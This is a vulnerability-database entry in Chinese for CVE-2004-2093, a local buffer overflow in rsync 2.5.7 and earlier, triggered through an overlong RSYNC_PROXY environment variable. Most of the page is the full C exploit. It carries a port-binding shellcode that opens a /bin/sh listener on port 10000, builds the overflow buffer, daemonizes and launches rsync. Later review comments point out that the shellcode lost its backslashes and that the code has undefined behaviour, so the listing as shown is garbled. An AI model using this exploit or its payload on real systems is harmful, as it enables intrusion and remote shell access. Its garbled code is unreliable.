socket.c for rsync缓冲区溢出漏洞

socket.c for rsync缓冲区溢出漏洞

漏洞ID 1107716 漏洞类型 缓冲区溢出
发布时间 2004-02-13 更新时间 2004-02-13
CVE编号 CVE-2004-2093
CNNVD-ID CNNVD-200402-040
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/152
https://www.securityfocus.com/bid/88206
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-040
|漏洞详情
rsync 2.5.7 及更早版本中 socket.c 的 open_socket_out 函数存在缓冲区溢出漏洞。本地用户可借助过长的 RSYNC_PROXY 环境变量导致拒绝服务（崩溃），并可能执行任意代码。
|漏洞EXP
/* 
* rsync <= 2.5.7 Local Exploit
* Saved EIP on stack is overwritten with address of shellcode in memory
* Generally rsync is not setuid or setgid so just a local shell is of no use
* So i used a portbinding shellcode as a PoC of a different attack vector.
* RET is calculated dynamically so payload can be changed just by changing shellcode
* Tested on:
* [eos@Matrix my]$ uname -a
* Linux Matrix 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
* coded by: abhisek linuxmail org
* Special Thanks: n2n, Hirosh Joseph
*/

#include <stdio.h>
/* Includes for code to daemonize */
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <fcntl.h>
/****/
#define PATH "/usr/local/bin/rsync"
#define BUFF_SIZE 100
//#define RET 0xbffffdfb

/* 88 bytes portbinding shellcode - linux-x86
* - by bighawk (bighawk warfare com)
*
* This shellcode binds a shell on port 10000
* stdin, stdout and stderr are dupped. accept() arguments are sane.
*/
/*
 * Payload that main() exports in the EGG environment variable.
 * NOTE(review): as reproduced on this page the literal consists of plain
 * ASCII text ("x31xdb" ...) rather than the byte values the per-line
 * comments describe, so strlen(shellcode) below counts characters of that
 * text, not payload bytes.
 */
char shellcode[] =
"x31xdb" // xor ebx, ebx
"xf7xe3" // mul ebx
"xb0x66" // mov al, 102
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x4b" // dec ebx
"xcdx80" // int 80h
"x89xc7" // mov edi, eax
"x52" // push edx
"x66x68x27x10" // push word 4135
"x43" // inc ebx
"x66x53" // push bx
"x89xe1" // mov ecx, esp
"xb0x10" // mov al, 16
"x50" // push eax
"x51" // push ecx
"x57" // push edi
"x89xe1" // mov ecx, esp
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"xb0x66" // mov al, 102
"xb3x04" // mov bl, 4
"xcdx80" // int 80h
"x50" // push eax
"x50" // push eax
"x57" // push edi
"x89xe1" // mov ecx, esp
"x43" // inc ebx
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"x89xd9" // mov ecx, ebx
"x89xc3" // mov ebx, eax
"xb0x3f" // mov al, 63
"x49" // dec ecx
"xcdx80" // int 80h
"x41" // inc ecx
"xe2xf8" // loop lp
"x51" // push ecx
"x68x6ex2fx73x68" // push dword 68732f6eh
"x68x2fx2fx62x69" // push dword 69622f2fh
"x89xe3" // mov ebx, esp
"x51" // push ecx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"xb0x0b" // mov al, 11
"xcdx80"; // int 80h
/* Shellcode by n2n [[email protected]] used for initial testing */
/*
char shellcode[]=
// setreuid(geteuid(),geteuid()), no use unless rsync is setuid, usually its not 
"x31xc0xb0x31xcdx80x93x89xd9x31xc0xb0x46xcdx80"
// setregid(getegid(),getegid()) 
"x31xc0xb0x32xcdx80x93x89xd9x31xc0xb0x47xcdx80"
// exec /bin/sh 
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80"
// exit() 
"x31xdbx89xd8xb0x01xcdx80";
*/
/*
 * SIGCHLD handler: reap every child that has already exited, without
 * blocking, so the detached process does not accumulate zombies.
 * The signal number is unused; the exit status is collected and discarded.
 */
void handler(int sig) {
    (void)sig;
    int status = 0;
    pid_t child;
    do {
        child = waitpid(-1, &status, WNOHANG);
    } while (child > 0);
}
/*
 * Detach from the controlling terminal: fork and let the parent exit,
 * start a new session, redirect stdin/stdout/stderr to /dev/null, ignore
 * signal numbers 1..63, then install handler() for SIGCHLD.
 * NOTE(review): the open("/dev/null") result is not checked, so on
 * failure dup2()/close() receive -1 (kept exactly as the original does).
 */
void go_daemon() {
    if (fork() != 0) {
        exit(0);
    }
    setsid();
    int nullfd = open("/dev/null", O_RDWR);
    int std_fd;
    for (std_fd = 0; std_fd <= 2; std_fd++) {
        dup2(nullfd, std_fd);
    }
    close(nullfd);
    int signo;
    for (signo = 1; signo < 64; signo++) {
        signal(signo, SIG_IGN);
    }
    signal(SIGCHLD, handler);
}
/*
 * Exploit driver (the original author's code, annotated only).
 * Builds an oversized RSYNC_PROXY value, exports it together with the
 * payload in EGG, detaches, and execs rsync from PATH.  Per the advisory
 * text above, open_socket_out() in rsync's socket.c copies RSYNC_PROXY
 * into a fixed-size buffer without a length check.
 * argv[1] (optional) overrides BUFF_SIZE; two or more arguments print
 * usage and exit(1).
 * Detection note: an rsync process whose environment carries an
 * RSYNC_PROXY value of this size is the observable indicator.
 */
int main(int argc,char *argv[]) {
char *buffer;
int size=BUFF_SIZE,i;
//unsigned long ret_addr=0xbffffffa;
/* Starting guess for the return address; reduced below by the lengths of
 * PATH and the payload (a stack-top region on the author's 2.4 kernel
 * named in the file header). */
unsigned long ret_addr=0xbffffffa;
//char *expbuff;
/* rsync target string; the "::" form presumably makes rsync take the
 * daemon-connect path on which RSYNC_PROXY is consulted -- verify against
 * rsync's socket.c. */
char *arg="localhost::rsync:getaddrinfo:XXX";
if(argc > 2) {
/* NOTE(review): the "n" in these printf formats reads like a "\n" whose
 * backslash was lost when the listing was reproduced; left as found. */
printf("USAGE:n%s BUFF_SIZEn",argv[0]);
exit(1);
}
if(argc == 2)
/* atoi() does no validation: a non-numeric, zero or negative argument is
 * passed straight into malloc() below. */
size=atoi(argv[1]);
buffer=(char*)malloc(size);
if(!buffer) {
printf("Error allocating memory on heapn");
exit(1);
}
ret_addr -= strlen(PATH);
ret_addr -= strlen(shellcode);
//ret_addr -= strlen(arg);
/*
expbuff=(char*)malloc(strlen(shellcode)+100);
if(!expbuff) {
printf("Error allocating memory on heapn");
exit(1);
}
memset(expbuff,0x90,strlen(shellcode)+100);
memcpy(expbuff+80,shellcode,strlen(shellcode));
expbuff[strlen(expbuff)-1]=0x00;
*/
/* Fill the buffer with repeated copies of ret_addr.  NOTE(review): each
 * store writes sizeof(unsigned long) bytes, so when size is not a multiple
 * of that width the final store runs past the allocation. */
for(i=0;i<size;i+=4) 
*(unsigned long*)(buffer+i)=ret_addr; 
memcpy(buffer,"XXX:",4);
/* NOTE(review): nothing above writes a terminator, so strlen(buffer) scans
 * beyond the allocation until it happens to find a zero byte -- undefined
 * behaviour as written. */
buffer[strlen(buffer)-1]=0x00;
printf("Using BUFF_SIZE=%dnRET=%pn",size,ret_addr);
/* RSYNC_PROXY is the overflowing input; EGG carries the payload. */
setenv("RSYNC_PROXY",buffer,1);
setenv("EGG",shellcode,1);
/* Daemonizing and executing /usr/local/bin/rsync */
go_daemon();
/* Only returns if execl() fails; that return value is not checked. */
execl(PATH,PATH,arg,NULL);
return 0;
}


// milw0rm.com [2004-02-13]
|参考资料

来源:XF
名称:linux-rsync-opensocketout-bo(15108)
链接:http://xforce.iss.net/xforce/xfdb/15108
来源:VULN-DEV
名称:20040209 rsync <= 2.5.7 local buffer overflow (no root today :)
链接:http://archives.neohapsis.com/archives/vuln-dev/2004-q1/0091.html
